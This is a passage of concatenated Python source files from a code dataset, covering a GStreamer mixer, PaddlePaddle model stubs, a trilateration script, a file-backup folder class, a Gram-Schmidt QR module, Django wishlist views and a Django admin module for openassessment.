int(int(datetime.datetime(year_UTC,month_UTC,day_UTC,(0)).timestamp() + int(time_difference)) )\n\n\t\treturn str(timestamp_at_midnight_UTC)\n\n\n\tdef settings_string_to_array(self,settings_list):\n\t\tsettings_used = {}\n\t\tfor n in settings_list:\n\t\t\tsettings_used[n]=self.loaded_settings[n]\n\t\treturn settings_used\n\n#################################\t\n# Pipeline handlers\t\t\t\t#\n#\t\t\t \t\t\t#\n#################################\n\tdef get_pipelines(self):\n\t\treturn self.pipelines_desc\n\n\tdef kill_pipeline(self,pipeline_number):\n\t\tprint('MIXTER LOG: trying to kill pipeline ' + str(pipeline_number))\n\t\tpipeline_name = self.pipelines_desc[pipeline_number]['pipeline_settings']['pipeline_name']\n\t\tprint(pipeline_name)\n\t\tif pipeline_name=='CONTINUITY':\n\t\t\t#self.pill2kill.set()\n\t\t\tself.CONTINUITY.suicide()\n\t\t\tdel self.pipelines_desc[pipeline_number]\n\t\t\tself.log_message(\"[WARNING] Gstreamer Pipeline: trying to kill pipeline \" + str(pipeline_number))\n\n\t\t#for ffmpeg pipelines, we need to kill the process and next one too? FIXME\n\t\telif 'pipeline_type' in self.pipelines_desc[pipeline_number]['pipeline_settings'] and self.pipelines_desc[pipeline_number]['pipeline_settings']['pipeline_type']=='ffmpeg':\n\t\t\tself.log_message(\"[WARNING] FFmpeg Pipeline: trying to kill pipeline \" + str(pipeline_number))\n\t\t\tsubprocess.call(\"kill -9 \"+str(self.pipelines_desc[pipeline_number]['pid']), shell=True)\n\t\t\tsubprocess.call(\"kill -9 \"+str(self.pipelines_desc[pipeline_number]['pid']+1), shell=True)\n\t\t\tdel self.pipelines_desc[pipeline_number]\n\t\t\t\n\t\telse:\n\t\t\tself.pipelines[pipeline_number].set_state(Gst.State.NULL)\n\t\t\tself.gst_pipeline_state = 'NULL'\n\t\t\tself.pipelines[pipeline_number]=None\n\t\t\tself.busses[pipeline_number]=None\n\t\t\tdel self.pipelines_desc[pipeline_number]\n\t\t\tself.log_message(\"[WARNING] Gstreamer Pipeline: trying to kill pipeline \" + str(pipeline_number))\n\n\t\t#delete gstreamer graph if any\n\t\ttry:\n\t\t\tprint('MIXTER LOG: trying to delete graph')\n\t\t\tself.log_message(\"[DEBUG] trying to delete graph\")\n\t\t\tsubprocess.call('rm '+self.loaded_settings['gst_graph_path']+'p_'+str(pipeline_number)+'*', shell=True)\n\t\texcept:\n\t\t\tpass\n\n\tdef kill_all_pipelines(self):\n\t\tprint('MIXTER LOG: trying to kill all pipelines')\n\t\tself.log_message(\"[WARNING] Pipelines: trying to kill all pipelines\")\n\n\t\tfor n in list(self.pipelines_desc):\n\t\t\tself.kill_pipeline(n)\n\n\n\tdef reconnect(self,pipeline_number=0):\n\t\t#self.log_message(\"[DEBUG] Reconnect \" + str(self.pipelines[pipeline_number].get_name()))\n\t\t#self.kill_ffmpeg()\n\t\ttime.sleep(.5)\n\t\tpipeline_text = self.pipelines_desc[pipeline_number]['pipeline_text']\n\t\tpipeline_settings = self.pipelines_desc[pipeline_number]['pipeline_settings']\n\t\ttry:\n\t\t\tself.pipelines[pipeline_number].set_state(Gst.State.NULL)\n\t\t\tself.gst_pipeline_state = 'NULL'\n\t\t\tself.pipelines[pipeline_number]=None\n\t\t\tself.busses[pipeline_number]=None\n\t\t\tdel self.pipelines_desc[pipeline_number]\n\t\texcept:\n\t\t\tprint('MIXTER LOG: Reconnect GST failure: is there any gstreamer pipeline?')\n\t\t\tself.log_message(\"[ERROR] Reconnect GST failure: is there any gstreamer pipeline?\")\n\t\t\n\t\ttry:\n\t\t\tself.pipelineRTMP.set_state(Gst.State.NULL)\n\t\t\tself.gst_pipeline_state = 'NULL'\n\t\t\tself.pipelineRTMP=None\n\t\texcept:\n\t\t\tpass\t\n\n\t\tself.busses[pipeline_number]=None\n\t\tprint('MIXTER LOG: Reconnect: executing 
build_pipeline')\n\t\tself.log_message(\"[WARNING] Reconnect: executing build_pipeline\")\n\t\tself.build_pipeline(pipeline_text,pipeline_settings)\n\n#################################\t\n# New methods\t\t\t\t\t#\n#\t\t\t \t\t\t#\n#################################\n\n\tdef dot_to_png(self,pipeline_id):\n\t\ttry:\n\t\t\tprint('MIXTER LOG: trying to convert .dot to .png')\n\t\t\tself.log_message(\"[DEBUG] trying to convert .dot to .png\")\n\t\t\tsubprocess.call('dot -Tpng -o '+self.loaded_settings['gst_graph_path']+pipeline_id+'.png '+self.loaded_settings['gst_graph_path']+pipeline_id+'.dot', shell=True)\n\t\texcept:\n\t\t\tpass\n\n\tdef be_loop(self):\n\t\t#self.disconnect_pipeline()\n\t\t#Mixter()\n\t\tGtk.main()\n\nGObject.threads_init()\nGst.init(None)\n","repo_name":"sporteiro/mixter","sub_path":"mixter.py","file_name":"mixter.py","file_ext":"py","file_size_in_byte":30786,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
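Mixter's core loop, parse-launch a pipeline, watch its bus, rebuild on failure, reduces to a small self-contained sketch (the videotestsrc pipeline string and the immediate-rebuild policy are illustrative stand-ins, not Mixter's actual configuration):

import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst, GLib

Gst.init(None)

def on_message(bus, message, pipeline):
    # On error or end-of-stream, tear the pipeline down and rebuild it,
    # mirroring the reconnect() behaviour in mixter.py.
    if message.type in (Gst.MessageType.ERROR, Gst.MessageType.EOS):
        pipeline.set_state(Gst.State.NULL)
        build()

def build():
    # videotestsrc stands in for Mixter's configurable sources.
    pipeline = Gst.parse_launch('videotestsrc ! autovideosink')
    bus = pipeline.get_bus()
    bus.add_signal_watch()
    bus.connect('message', on_message, pipeline)
    pipeline.set_state(Gst.State.PLAYING)
    return pipeline

if __name__ == '__main__':
    build()
    GLib.MainLoop().run()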
+{"seq_id":"74292883715","text":"from __future__ import annotations\n\nfrom typing import Any\n\nfrom ... import Tensor, nn\nfrom ..ops import ConvNormActivation as ConvNormActivation\n\nclass InceptionStem(nn.Layer):\n conv_1a_3x3: Any = ...\n conv_2a_3x3: Any = ...\n conv_2b_3x3: Any = ...\n max_pool: Any = ...\n conv_3b_1x1: Any = ...\n conv_4a_3x3: Any = ...\n def __init__(self) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionA(nn.Layer):\n branch1x1: Any = ...\n branch5x5_1: Any = ...\n branch5x5_2: Any = ...\n branch3x3dbl_1: Any = ...\n branch3x3dbl_2: Any = ...\n branch3x3dbl_3: Any = ...\n branch_pool: Any = ...\n branch_pool_conv: Any = ...\n def __init__(self, num_channels: Any, pool_features: Any) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionB(nn.Layer):\n branch3x3: Any = ...\n branch3x3dbl_1: Any = ...\n branch3x3dbl_2: Any = ...\n branch3x3dbl_3: Any = ...\n branch_pool: Any = ...\n def __init__(self, num_channels: Any) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionC(nn.Layer):\n branch1x1: Any = ...\n branch7x7_1: Any = ...\n branch7x7_2: Any = ...\n branch7x7_3: Any = ...\n branch7x7dbl_1: Any = ...\n branch7x7dbl_2: Any = ...\n branch7x7dbl_3: Any = ...\n branch7x7dbl_4: Any = ...\n branch7x7dbl_5: Any = ...\n branch_pool: Any = ...\n branch_pool_conv: Any = ...\n def __init__(self, num_channels: Any, channels_7x7: Any) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionD(nn.Layer):\n branch3x3_1: Any = ...\n branch3x3_2: Any = ...\n branch7x7x3_1: Any = ...\n branch7x7x3_2: Any = ...\n branch7x7x3_3: Any = ...\n branch7x7x3_4: Any = ...\n branch_pool: Any = ...\n def __init__(self, num_channels: Any) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionE(nn.Layer):\n branch1x1: Any = ...\n branch3x3_1: Any = ...\n branch3x3_2a: Any = ...\n branch3x3_2b: Any = ...\n branch3x3dbl_1: Any = ...\n branch3x3dbl_2: Any = ...\n branch3x3dbl_3a: Any = ...\n branch3x3dbl_3b: Any = ...\n branch_pool: Any = ...\n branch_pool_conv: Any = ...\n def __init__(self, num_channels: Any) -> None: ...\n def forward(self, x: Any) -> Tensor: ...\n\nclass InceptionV3(nn.Layer):\n num_classes: Any = ...\n with_pool: Any = ...\n layers_config: Any = ...\n inception_stem: Any = ...\n inception_block_list: Any = ...\n avg_pool: Any = ...\n dropout: Any = ...\n fc: Any = ...\n def __init__(\n self,\n num_classes: int = ...,\n with_pool: bool = ...,\n ) -> None: ...\n def forward(self, x: Tensor) -> Tensor: ...\n __call__ = forward\n\ndef inception_v3(\n pretrained: bool = ...,\n *,\n num_classes: int = ...,\n with_pool: bool = ...,\n) -> InceptionV3: ...\n","repo_name":"cattidea/paddlepaddle-stubs","sub_path":"paddle-stubs/vision/models/inceptionv3.pyi","file_name":"inceptionv3.pyi","file_ext":"pyi","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"}
+{"seq_id":"24078078607","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom mpmath import mp\nimport matplotlib.colors as mcolors\n\n\ndef Trilateration_3D(towers, distances):\n \"\"\"\n This program implements trilateration in 3 dimensions.\n It aims to determine the position of a point (posi) in space based on the\n position (coordinates) of P points in space and the distance\n from the unknown point to these known points.\n\n This implementation is a Cartesian 'true-range multilateration'.\n By using the first point and the Pythagorean theorem, we can calculate the distances\n between posi and the centers of the spheres.\n \"\"\"\n\n positions = []\n num_towers = len(towers)\n\n for i in range(num_towers - 3):\n # Select a subset of 4 towers\n towers_subset = towers[i:i + 4]\n distances_subset = distances[i:i + 4]\n\n # coordinates: p1 = [x, y, z] and radii.\n p = []\n for j in range(len(towers_subset)):\n p.append(np.array(towers_subset[j][:3], dtype=np.longdouble))\n r = np.array(distances_subset, dtype=np.longdouble)\n\n d, i_vals, j_vals, e_x, e_y, e_z = [], [], [], [], [], []\n for k in range(len(towers_subset) - 3):\n # the Euclidean distance between p[k + 1] and p[k]\n d.append(np.linalg.norm(p[k + 1] - p[k]).astype(np.longdouble))\n # the unit vector e_x in the direction from p1 to p2.\n e_x.append((p[k + 1] - p[k]) / np.linalg.norm(p[k + 1] - p[k]).astype(np.longdouble))\n # the projection of the vector from p[k + 2] to p[k] onto the e_x vector.\n i_vals.append(np.dot(e_x[k], (p[k + 2] - p[k])).astype(np.longdouble))\n # the unit vector e_y: subtracting the component of the vector from p[k] to p[k + 2] that lies along e_x\n e_y.append((p[k + 2] - p[k] - (i_vals[k] * e_x[k])) / np.linalg.norm(\n p[k + 2] - p[k] - (i_vals[k] * e_x[k])).astype(np.longdouble))\n # the projection of the vector from p[k + 2] to p[k] onto the e_y vector.\n j_vals.append(np.dot(e_y[k], (p[k + 2] - p[k])).astype(np.longdouble))\n # the cross product of the e_x and e_y vectors, resulting in the orthogonal unit vector e_z.\n e_z.append(np.cross(e_x[k], e_y[k]).astype(np.longdouble))\n\n x, y, z1, z2 = [], [], [], []\n for k in range(len(towers_subset) - 3):\n x_val = ((r[k] ** 2) - (r[k + 1] ** 2) + (d[k] ** 2)) / (2 * d[k])\n x.append(x_val.astype(np.longdouble))\n # calculates the x-coordinate of the trilaterated point based on the distances and radii.\n y_val = (((r[k] ** 2) - (r[k + 2] ** 2) + (i_vals[k] ** 2) + (j_vals[k] ** 2)) / (2 * j_vals[k])) - (\n (i_vals[k] / j_vals[k]) * x_val)\n y.append(y_val.astype(np.longdouble))\n # calculates the y-coordinate of the trilaterated point based on the distances,radii, and projection values.\n z1.append(np.sqrt(np.abs(r[k] ** 2 - x_val ** 2 - y_val ** 2)).astype(np.longdouble))\n # calculates the positive z-coordinate of the trilaterated point based on the distances, radii, and the x\n # and y coordinates. It uses the Pythagorean theorem to find the z-coordinate.\n z2.append((z1[k] * (-1)).astype(np.longdouble))\n # calculates the negative z-coordinate by multiplying the positive z-coordinate z1 with (-1), because\n # trilateration can have two possible solutions in 3D space, and\n # the negative value represents the other solution.\n\n ans1, ans2, dist1, dist2 = [], [], [], [] # ans1 is the first ansatz\n for k in range(len(towers_subset) - 3):\n # the first possible trilaterated point is calculated by summing the reference point p[k] with the\n # respective components along the x, y, and z axes. 
The values x[k], y[k], and z1[k] are multiplied by their\n            # respective unit vectors e_x[k], e_y[k], and e_z[k], and the results are added together.\n            ans1.append((p[k] + (x[k] * e_x[k]) + (y[k] * e_y[k]) + (z1[k] * e_z[k])).astype(np.longdouble))\n            ans2.append((p[k] + (x[k] * e_x[k]) + (y[k] * e_y[k]) + (z2[k] * e_z[k])).astype(np.longdouble))\n            # the distance between the fourth point and each of the two candidates from ans1 and ans2.\n            dist1.append(np.linalg.norm(p[k + 3] - ans1[k]).astype(np.longdouble))\n            dist2.append(np.linalg.norm(p[k + 3] - ans2[k]).astype(np.longdouble))\n\n        mean_positions = np.mean(ans1, axis=0, dtype=np.longdouble)\n\n        # Append the calculated position to the list of positions\n        positions.append(mean_positions)\n\n    return positions\n\n\nif __name__ == \"__main__\":\n\n    # import TowersAndConstants, TDOASimulation and SolveFunctions modules from main\n    # we now have the distance from each tower to the estimated transmitter position\n    from main import *\n    tx = fnc\n    distances = distancesToEstimatedTransmitterPosition\n    noise = 1e-3\n    distances += np.random.normal(loc=0, scale=noise, size=number_towers)\n    locations = []\n\n    # Print out the data\n    print(\"The input points, in the format of [x, y, z], are:\")\n    for i, (tower, distance) in enumerate(zip(towers, distances)):\n        print(f\"Tower {i + 1}: {tower} Distance: {distance}\")\n\n    positions = Trilateration_3D(towers, distances)\n\n    positions_array = np.array(positions, dtype=np.longdouble)\n\n    # Check if the z coordinate is negative and if so, make it positive\n    if (positions_array[:, 2] < 0).any():\n        positions_array[:, 2] = np.abs(positions_array[:, 2])\n\n    def format_positions(posi, decimal_places):\n        formatted_values = [\n            (\"[{}]\".format(\", \".join([\"{:.{}f}\".format(np.longdouble(x), decimal_places) for x in pos.tolist()])))\n            for pos in posi\n        ]\n        return formatted_values\n\n    formatted_positions = []\n    for pos in positions_array:\n        pos_formatted = [np.format_float_scientific(x, unique=False, precision=precision) for x in pos]\n        formatted_positions.append(pos_formatted)\n\n    original_location = np.array(tx)\n\n    positions_array = positions_array.astype(np.longdouble)\n    for pos in formatted_positions:\n        print(\"Position: {}\".format(pos))\n\n    error_list = []\n    for i, position in enumerate(formatted_positions):\n        mp.dps = precision\n        np.set_printoptions(precision=precision)\n        current_position_mpf = np.array(position, dtype=np.longdouble)\n\n        # Calculate axis-wise differences (absolute values)\n        result_mpf = [abs(current_position_mpf[j] - tx[j]) for j in range(3)]\n        mean_error_tri = np.mean(result_mpf)\n        error_list.append(mean_error_tri)\n\n    # error_list now holds, per tower subset, the mean absolute per-axis difference between the estimate and tx\n    print(\"absolute_mean_array_error: {}\".format(error_list))\n\n    # Extract the z-coordinates for color mapping\n    z_coordinates = positions_array[:, 2]\n\n    # Create a figure and axis\n    fig, ax = plt.subplots(figsize=(8, 8))\n    # Plot the positions_array data with color mapping based on the z-coordinate\n    scatter = ax.scatter(positions_array[:, 0], positions_array[:, 1], c=z_coordinates, cmap='viridis',\n                         label='Positions')\n\n    # Plot the literature value tx\n    ax.scatter(tx[0], tx[1], c='r', marker='x', label='tx')\n\n    # Set labels and title\n    ax.set_xlabel('X axis')\n    ax.set_ylabel('Y axis')\n    ax.set_title('Visualization of the positions with tx')\n\n    # Create a custom colorbar\n    color_map = plt.cm.ScalarMappable(cmap='viridis',\n                                      norm=mcolors.Normalize(vmin=min(z_coordinates), vmax=max(z_coordinates)))\n    color_map.set_array(z_coordinates)\n    cbar = plt.colorbar(color_map, ax=ax)\n    num_ticks = 10\n    cbar.set_ticks(np.linspace(min(z_coordinates), max(z_coordinates), num_ticks))\n    cbar.set_ticklabels([f'{x:.12f}' for x in np.linspace(min(z_coordinates), max(z_coordinates), num_ticks)])\n\n    cbar.set_label('Z axis')\n\n    # Highlight the tx value on the colorbar\n    cbar.ax.scatter(0.5, tx[2], c='r', marker='x', label='tx')\n    ax.grid(which='major', color='#DDDDDD', linewidth=0.8)\n    ax.grid(which='minor', color='#EEEEEE', linestyle=':', linewidth=0.5)\n    ax.minorticks_on()\n\n    ax.legend()\n    plt.show()\n\n    \"\"\"\n    Fit curve\n    \"\"\"\n    def linear_model(x, a, b):\n        return a * x + b\n\n    # Fit the error data with a linear model; the x-data are the tower\n    # counts that produced each error entry (4 .. number_towers).\n    l = np.array(range(4, number_towers + 1))\n    params_tri, _ = curve_fit(linear_model, l, error_list, method='lm')\n\n    # Generate x-values for the plot\n    x = np.linspace(4, number_towers, 70)\n\n    # Compute the fitted curve using the optimized parameters\n    fit_curve_tri = linear_model(x, params_tri[0], params_tri[1])\n\n    # Plot the original data and the fitted curve\n    fig, ax = plt.subplots(figsize=(14, 8))\n    ax.scatter(l, error_list, label='error_tri', s=30, c='r', marker='o')\n\n    plt.xlabel('Number of Towers')\n    plt.ylabel('Error')\n\n    ax.set_yscale('asinh')\n\n    # Create a secondary y-axis\n    ax2 = ax.twinx()\n\n    # Plot the fitted curve with a different y-axis limit\n    ax2.plot(x, fit_curve_tri, color='black', label='Fitted Curve (tri)')\n    ax2.set_ylabel('Fitted Curve')\n\n    # Combine the legends of both plots\n    handles, labels = ax.get_legend_handles_labels()\n    handles2, labels2 = ax2.get_legend_handles_labels()\n    ax.legend(handles + handles2, labels + labels2)\n\n    text_x = number_towers * 0.5  # x-coordinate for the text annotation\n    text_y = ax.get_ylim()[1] * 1.03  # y-coordinate for the text annotation\n    a_value = params_tri[0]\n    text = f'a = {a_value}'\n    ax.text(text_x, text_y, text, fontsize=12, ha='center')\n\n    plt.show()\n","repo_name":"Mem314/Multilateration","sub_path":"trilateration.py","file_name":"trilateration.py","file_ext":"py","file_size_in_byte":9931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
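The closed-form step inside Trilateration_3D can be sanity-checked without the repo's main module. Below is a self-contained sketch of the same true-range construction with exact (noise-free) distances; the tower layout, test point, and function name are made up for the check:

import numpy as np

def trilaterate_once(p1, p2, p3, p4, r):
    """Solve for a point from 4 towers and true ranges r (Cartesian method)."""
    d = np.linalg.norm(p2 - p1)
    e_x = (p2 - p1) / d
    i = np.dot(e_x, p3 - p1)
    e_y = (p3 - p1 - i * e_x) / np.linalg.norm(p3 - p1 - i * e_x)
    j = np.dot(e_y, p3 - p1)
    e_z = np.cross(e_x, e_y)
    x = (r[0]**2 - r[1]**2 + d**2) / (2 * d)
    y = (r[0]**2 - r[2]**2 + i**2 + j**2) / (2 * j) - (i / j) * x
    z = np.sqrt(max(r[0]**2 - x**2 - y**2, 0.0))
    cand = [p1 + x * e_x + y * e_y + s * z * e_z for s in (+1, -1)]
    # The fourth tower disambiguates the two mirror-image solutions.
    return min(cand, key=lambda c: abs(np.linalg.norm(p4 - c) - r[3]))

towers = np.array([[0., 0., 0.], [10., 0., 0.], [0., 10., 0.], [0., 0., 10.]])
target = np.array([3., 4., 5.])
dists = np.linalg.norm(towers - target, axis=1)
print(trilaterate_once(*towers, dists))  # recovers approximately [3. 4. 5.]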
+{"seq_id":"10224982114","text":"from __future__ import annotations\n\nimport json\nimport time\nfrom pathlib import Path\nfrom typing import Union\n\nfrom errors import UnableToAccessException\nfrom records.base_record import BaseRecord\nfrom records.file import File\n\n\nclass Folder(BaseRecord):\n \"\"\"\n Folder class\n Represents folder in a filesystem in a form of an instance\n Inherits from BaseRecord class\n\n Stores information about the file\n Attributes:\n handler handler to manipulate a real file\n modified last time of a file\n size size of a file\n id unique id of a record\n base_location needed to know the relative and absolute path\n \"\"\"\n\n def __init__(self, path, handler, base_path=None, stat: dict = None):\n super().__init__()\n path_obj = Path(path)\n\n self.handler = handler\n self.path = path\n\n self.base_location = base_path\n self.name = path_obj.name\n self.children = dict()\n\n self.set_stat(stat)\n\n def set_stat(self, stat: dict = None) -> None:\n if not stat:\n stat = self.handler.get_folder_stat(self.path)\n\n self.id = stat.get(\"id\")\n self.size = stat.get(\"size\")\n self.modified = stat.get(\"modified\")\n\n def add_child(self, record: Union[Folder, File]):\n \"\"\"\n Adds the child records to the folder structure\n :param record: Folder or File object instance\n :return: None\n \"\"\"\n self.children[record.path] = record\n\n def set_content(self):\n \"\"\"\n Recursively adds children to self and nested folders\n :return: None\n \"\"\"\n content = self.handler.get_folder_content(self)\n for record in content:\n self.add_child(record)\n if isinstance(record, Folder):\n record.set_content()\n\n def copy(self, remote_location, remote_handler, with_content=False) -> Folder:\n \"\"\"\n Copies the folder into a remote location\n Uses remote handler to create and store file\n\n If specified copies all the content of the folder\n\n :param remote_location: remote path used to save a folder\n :param remote_handler: remote handler to handle folder creation\n :param with_content: whether to copy folder contents\n :return: newly created folder\n \"\"\"\n new_folder = remote_handler.upload_folder(self, remote_location, with_content)\n return new_folder\n\n def get_structure(self) -> dict:\n \"\"\"\n Gets the file structure of the folder recursively\n\n :return: file structure dictionary\n \"\"\"\n structure = dict()\n structure[self.path] = dict()\n structure[self.path][\"data\"] = self.get_dict()\n children = []\n\n for path, record in self.children.items():\n if isinstance(record, Folder):\n children.append(record.get_structure())\n else:\n children.append(record.get_dict())\n structure[self.path][\"children\"] = children\n return structure\n\n def dump_structure(self, save_folder: Folder = None) -> File:\n if not save_folder:\n save_folder = self\n structure = self.get_structure()\n structure_encoded = json.dumps(structure, indent=4, ensure_ascii=False).encode(\"utf-8\")\n\n file = save_folder.handler.upload_structure(save_folder, structure_encoded)\n\n return file\n\n def __str__(self):\n return f\"Type: Folder\\n\" \\\n f\"Lctn: {self.path}\\n\" \\\n f\"Name: {self.name}\\n\" \\\n f\"Size: {self.size}\\n\" \\\n f\"Modf: {self.modified}\\n\" \\\n f\"Id: {self.id}\\n\"\n","repo_name":"Denis-Source/file_backup","sub_path":"records/folder.py","file_name":"folder.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25244048417","text":"import LA\r\n\r\ndef normalize(vector: list) -> list:\r\n '''Normalizes the input vector. The norm of the input vector is found using\r\n p_norm. Then the input vector is then multiplied by 1/norm. The result and \r\n norm are then returned.\r\n\r\n Arguments:\r\n vector: A vector stored as a list contanining real/complex numbers.\r\n\r\n Returns:\r\n The normalized input vector and norm of the input vector.\r\n '''\r\n norm: float = LA.p_norm(vector)\r\n result: list = LA.sca_vec_mult(1/norm,vector)\r\n\r\n return [result,norm]\r\n\r\n\r\ndef orthagonalize(vector: list, basis: list) -> list:\r\n '''Orthagonalizes the input vector rejection of input vector on input basis\r\n vector. Using inner_product the inner product of the input vector and input\r\n basis and stored as product. The product is then used as a scalar to find \r\n the negated vector projection of the input vector on the input basis using\r\n sca_vec_mult and subtracted from the input vector, stored as \r\n negated_projection. Then using add_vectors add the input vector and the \r\n negated_projection, stored as result. The result and product is returned.\r\n\r\n Arguments:\r\n vector: A vector stored as a list.\r\n basis: A second vector stored as a list.\r\n Returns:\r\n The orthagonalized input vector and the inner product of the input\r\n vector and input basis vector.\r\n '''\r\n product: complex = LA.inner_product(vector,basis)\r\n negated_projection: list[complex] = LA.sca_vec_mult(-1*product,basis)\r\n result: list[complex] = LA.add_vectors(vector,negated_projection)\r\n\r\n return [result,product]\r\n\r\ndef stable_gram_schmidt(matrix: list) -> list:\r\n '''Uses the Modified Gram-Schmidt formula to find the reduced QR \r\n factorization of the input matrix.\r\n First, initialize matrix Q to be a copy of the input matrix and matrix R to\r\n be a 0 matrix. Then, iterate over every column vector in matrix Q. \r\n Normalize the vector and store the normalization in matrix R. Then, \r\n orthagonalize every following vector in matrix Q corresponding to the current\r\n column that is being evaluated, stored as matrix R. Returning the matrices \r\n Q and R.\r\n Arguments:\r\n matrix: A matrix stored as a list of lists.\r\n Returns:\r\n The orthonormal matrix, Q of the input matrix and the upper triangular \r\n matrix, R fo the input matrix.\r\n '''\r\n Q: list = [column[:] for column in matrix]\r\n R: list = [[0 for m in matrix] for n in matrix]\r\n \r\n for element, vector in enumerate(Q):\r\n normalize_operation = normalize(vector)\r\n Q[element] = normalize_operation[0]\r\n R[element][element] = normalize_operation[1]\r\n for index, orthagonal_vector in enumerate(Q[element+1:],start=element+1):\r\n orthagonal_operation = orthagonalize(orthagonal_vector,vector)\r\n Q[index] = orthagonal_operation[0]\r\n R[index][element] = orthagonal_operation[1]\r\n\r\n return [Q,R]\r\n\r\ndef orthonormal(matrix: list) -> list:\r\n \"\"\"Finds the orthonormal list of vectors(or lists) of the input matrix. \r\n Uses stable_gram_schmidt and returns Q of the QR factorization and stored\r\n as a list of vectors(or lists) in result. 
The result is then returned.\r\n Arguments:\r\n matrix: A matrix stored as a list of vectors(or lists).\r\n Returns:\r\n An orthonormal matrix with the same span as the input matrix\r\n \"\"\"\r\n result: list = stable_gram_schmidt(matrix)[0]\r\n return result\r\n","repo_name":"Chase-Stearns/Math_3430_Fall_2021","sub_path":"QR.py","file_name":"QR.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
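Assuming LA's conventions (matrices stored as lists of column vectors, and p_norm/inner_product/sca_vec_mult/add_vectors behaving as their names suggest), a quick numerical check of the factorization can be done with NumPy used only for the comparison; a sketch:

import numpy as np
from QR import stable_gram_schmidt

# Columns of the test matrix, in the module's list-of-column-vectors convention.
A = [[1.0, 1.0, 0.0], [1.0, 0.0, 1.0], [0.0, 1.0, 1.0]]
Q, R = stable_gram_schmidt(A)

Qm = np.array(Q).T  # each inner list is a column
Rm = np.array(R).T  # R is also stored column-wise, so transpose to rows
Am = np.array(A).T

# Q should have orthonormal columns and Q @ R should rebuild A.
assert np.allclose(Qm.T @ Qm, np.eye(3))
assert np.allclose(Qm @ Rm, Am)
print('QR factorization verified')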
+{"seq_id":"35590296758","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import WishListOrderItem, WishListOrder\nfrom account.models import Profile\nfrom shop.models import Product,Category \nfrom cart.views import generate_order_id\nfrom django.contrib import messages\nfrom django.urls import reverse\n\n\ndef get_user_pending(request):\n # get order for the correct user\n if request.user.is_authenticated:\n user_profile = get_object_or_404(Profile, user=request.user)\n order = WishListOrder.objects.filter(owner=user_profile, is_ordered=False)\n if order.exists():\n # get the only order in the list of filtered orders\n return order[0]\n return 0\n else:\n return \" \" \n\n\ndef add_to_wishlist(request, **kwargs):\n \n # get the user profile\n user_profile = get_object_or_404(Profile, user=request.user)\n # filter products by id\n product = Product.objects.filter(id=kwargs.get('item_id', \"\")).first()\n # check if the user already owns this product\n if product in request.user.profile.product.all():\n messages.info(request, 'You already added this product')\n return redirect(reverse('shop-list')) \n # create orderItem of the selected product\n\n order_item, status = WishListOrderItem.objects.get_or_create(product=product)\n # create order associated with the user\n user_order, status = WishListOrder.objects.get_or_create(owner=user_profile, is_ordered=False)\n user_order.items.add(order_item)\n if status:\n # generate a reference code\n user_order.ref_code = generate_order_id()\n user_order.save()\n\n # show confirmation message and redirect back to the same page\n messages.info(request, \"item added to wishlist\")\n return redirect(reverse('shop-list'))\n \n context = {\n \n }\n\n return render(request, template, context) \n\n\n\ndef delete_from_wishlist(request, item_id):\n item_to_delete = WishListOrderItem.objects.filter(pk=item_id)\n if item_to_delete.exists():\n item_to_delete[0].delete()\n messages.info(request, \"Item has been deleted\")\n return redirect(reverse('wishlist:wishlist'))\n\ndef wishlist(request, **kwargs):\n\n template = 'wishlist/wishlist.html'\n category = Category.objects.all()\n eo = get_user_pending(request)\n context = {\n\n 'categories': category,\n 'eo': eo\n\n }\n return render(request, template, context)\n\n \n\n\n\n \n","repo_name":"Mulelur/smartmallo","sub_path":"wishlist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29031345015","text":"\"\"\"\nDjango admin models for openassessment\n\"\"\"\nimport json\n\nfrom django.contrib import admin\nfrom django.core.urlresolvers import reverse\nfrom django.utils import html\n\nfrom openassessment.assessment.models import (\n Assessment, AssessmentFeedback, PeerWorkflow, PeerWorkflowItem, Rubric,\n AIGradingWorkflow, AITrainingWorkflow, AIClassifierSet, AIClassifier\n)\nfrom openassessment.assessment.serializers import RubricSerializer\n\n\nclass RubricAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for Rubrics.\n \"\"\"\n list_per_page = 20 # Loads of criteria summary are moderately expensive\n\n list_display = ('id', 'content_hash', 'criteria_summary')\n list_display_links = ('id', 'content_hash')\n search_fields = ('id', 'content_hash')\n readonly_fields = (\n 'id', 'content_hash', 'structure_hash',\n 'points_possible', 'criteria_summary', 'data'\n )\n\n def criteria_summary(self, rubric_obj):\n \"\"\"Short description of criteria for presenting in a list.\"\"\"\n rubric_data = RubricSerializer.serialized_from_cache(rubric_obj)\n return u\", \".join(\n u\"{} - {}: {}\".format(criterion[\"name\"], criterion['label'], criterion[\"points_possible\"])\n for criterion in rubric_data[\"criteria\"]\n )\n\n def data(self, rubric_obj):\n \"\"\"Full JSON string of rubric, indented and HTML formatted.\"\"\"\n rubric_data = RubricSerializer.serialized_from_cache(rubric_obj)\n return u\"\\n{}\\n\".format(\n html.escape(json.dumps(rubric_data, sort_keys=True, indent=4))\n )\n data.allow_tags = True\n\n\nclass PeerWorkflowItemInline(admin.StackedInline):\n \"\"\"\n Django admin model for PeerWorkflowItems.\n \"\"\"\n model = PeerWorkflowItem\n fk_name = 'author'\n raw_id_fields = ('author', 'scorer', 'assessment')\n extra = 0\n\n\nclass PeerWorkflowAdmin(admin.ModelAdmin):\n \"\"\"\n Django admin model for PeerWorkflows.\n \"\"\"\n list_display = (\n 'id', 